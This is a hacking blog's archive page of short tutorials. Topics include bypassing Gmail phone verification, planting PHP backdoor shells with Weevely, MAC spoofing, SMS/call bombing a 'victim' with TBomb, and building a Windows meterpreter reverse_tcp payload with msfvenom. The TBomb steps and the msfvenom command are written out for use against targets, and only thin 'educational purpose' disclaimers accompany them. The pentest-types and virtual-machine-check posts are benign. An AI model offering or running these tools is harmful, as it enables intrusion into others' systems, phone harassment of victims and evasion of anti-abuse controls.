Skip to main content

Posts

Showing posts from September, 2020

How to create multiple gmail accounts without phone number verification

How to create multiple gmail accounts without phone number verification Hello friends, as always today I have brought a great trick for all of you, that you can create multiple Gmail accounts without phone number verification. Google mail is known for its best UI(user interface), easy to use, more convenient & having multiple features than others mailing service providers like Yahoo mail, Hotmail & others. Since,   there are number of people who requires multiple gmail account as they need to interact with multiple people on their daily  basis and thus they had to share their account for communication on various purposes, for every account that one creates, requires a phone number and it's definitely not possible for an individual to have so many phone numbers and therefore people search for an alternative ways to create multiple account. Also many people uses gmail accounts for self promotion Like YouTube, Instagram, Blogger, etc and they require many different accounts, 

How To Hack Websites By Uploading PHP Backdoor Shell

This post is about Website Hacking with the help of backdoor .Today we learn how to hack website using PHP backdoor shell. Weevely is the tool which help to inject backdoor into any PHP website. We upload file into website such as Doc ,PDF file and picture and you can upload own make PHP page into website ,This tool find weakness into your target if the site is vulnerable you can upload any thing into the website .if we upload malware type thing its harm target website.how to hack website using PHP backdoor shell. What is backdoor? In Ethical hacking Hacking and cyber Security World the Backdoor is a method by which attacker access anyone computer ,website etc without their permission ,once attacker successfully upload backdoor in target website ,they created a session into website . What is Weevely? weevely is a web based software that provide PHP web shell which upload to a website and backdoor executed.keep in mind it,s work on PHP website ,their is million of website in world that

What Is MAC Address Spoofing And Spoofing Tutorial.

  MAC Address Today we learn about MAC address and it’s spoofing. What is MAC address and MAC address spoofing, How to do MAC address spoofing? We learn all these concepts step by step. Firstly, I will tell you what is MAC address. So, MAC address (Media Access Control Address), is an address which is given to all devices which are connected to the internet. It is also known as a permanent physical address. It is 48-bit code 6 hex pair code. Commonly, you see it on the back side of your router, modem etc. It’s first 3 octet shows OUI (Organization Unique Identity) the information of the company in which the device is created and the last 3 octet shows us the NIC (Network Interface Controller) This shows us the working of the device for which purpose it is built. This address is like IP address but the difference on both is that: We can change IP address but we can’t change MAC address easily till it changes manually. With the help of MAC address, any device location is trackable. So, I

Types of Penetration Tests

  Types Of Penetration Tests And Their Description Depending on the scope of the testing, there are a number of different types of tests that might be performed. The differences in these tests lies chiefly in the amount of information the penetration testing team has prior to the rest itself. External Testing External Testing simulates an attack on a target company's servers and devices which are externally visible (visible from the internet). This type of test determines if an outside attacker can get into the network, and if so, how deeply into the system they can breach. An external penetration test attempts to break into domain name servers (DNS), web servers, email servers, and get through firewalls. Internal Testing Internal Testing simulates an attack from within an organization, carried out by an authorized user with some level of access privilege, such as an angry employee or someone acting as a "corporate spy." This test is from within the boundaries of the fire

How to Check if Linux System is Running on Physical System or Virtual Machine

  Wondering if your Linux server is a virtual machine or a physical system? Here's how to check it. If you work with Linux servers, chances are that you use SSH to connect to the remote server. In such cases where you don't have direct access to the system, you might wonder whether your server is running in a virtual machine or on a physical system. Let me show you how to do that. Check if server is physical or virtual There are several commands you can use for this purpose. Using dmidecode command The simplest way to check that is by using the dmidecode command. sudo dmidecode -s system-manufacturer If it is a physical system, you should see the name of the manufacturer like Dell, Lenovo etc. If it is a virtual system, you should see an output like QEMU, innotek Gmbh (for VirtualBox). The dmidecode command is used for decoding a computer's DMI information in human-readable format. DMI, short for Desktop Management Interface, is a standard that (almost) all system manufactu

SMS/Call Bombing From Termux | Using TBomb

Send Bulk SMS And Calls to The Victim, For Only Fun And Educational Purpose! ▫️Used Tool: TBomb In Termux 🔸Installation: For Update And Upgrade: apt update apt upgrade ▫️Installation Of TBomb: pkg up -y pkg install git -y pkg install python -y git clone https://github.com/TheSpeedX/TBomb cd TBomb python -m pip install -r requirements.txt bash TBomb.sh Press Enter 2 Times, And Installation Is Done 🔸Using: After Installation You Will See 2 Options: SMS Bombing Call Bombing 1. Select Any Of It, It Will Ask You For Country Code. Type The Country Code Of Victim Without ' + ' Sign 2. Now It Asks For The Mobile Number, type The Victim's Mobile Number 3. Now It Ask The Number Of SMS/Calls To Be Sent, Type the Number And Press Enter (Type ' 0 ' (Zero) For Unlimited) 4. Boom, The Bomber Has Started.

System Hacking In Kali Linux

Hacking System With Kali Linux. This Tutorial Is Only For Educational Purpose. What Is System Hacking? Illegal way to access someone’s computer that’s call system hacking a hacker hack the system using the malware, payload, and virus, Some hacking types are perfectly legal, One of the most important methods used by hackers in order to circumvent the standard authentication is password cracking. It is actually the very first step in the system hacking process. a hacker needs to physically access the target system and inject the payload target system. Let’s try some example Windows System Hacking First we create a payload using the metasploit framework simple run the command. payload is the part of transmitted data that is the actual intended message. msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe Parameter uses -p Payload to use lhost Attacker IP address lport Attacker listing port -f Output formate > Payload output filename and we